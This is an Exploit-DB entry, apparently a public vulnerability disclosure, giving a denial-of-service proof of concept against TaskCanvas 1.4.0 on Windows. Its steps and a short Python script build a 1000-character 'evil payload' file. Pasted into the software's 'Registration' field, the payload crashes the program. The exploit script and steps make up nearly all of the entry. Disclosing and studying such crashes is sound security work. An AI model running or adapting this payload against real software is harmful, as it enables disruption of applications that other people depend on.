TaskCanvas 1.4.0 - 'Registration' Denial Of Service

EDB-ID:

47911

CVE:

N/A

EDB Verified:

Author:

Ismail Tasdelen

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2020-01-13

Vulnerable App: 
# Exploit Title: TaskCanvas 1.4.0 - 'Registration' Denial Of Service
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : https://www.digitalvolcano.co.uk/
# Link Software : https://www.digitalvolcano.co.uk/taskcanvasdownload.html
# Tested on OS: Windows 10
# CVE : N/A

'''
Proof of Concept (PoC):
=======================

1.Download and install TaskCanvas
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Registration -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Registration' and click on 'Ok'
6.TaskCanvas Crashed
'''

#!/usr/bin/python
    
buffer = "A" * 1000
 
payload = buffer
try:
    f=open("poc.txt","w")
    print("[+] Creating %s bytes evil payload." %len(payload))
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created.")
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services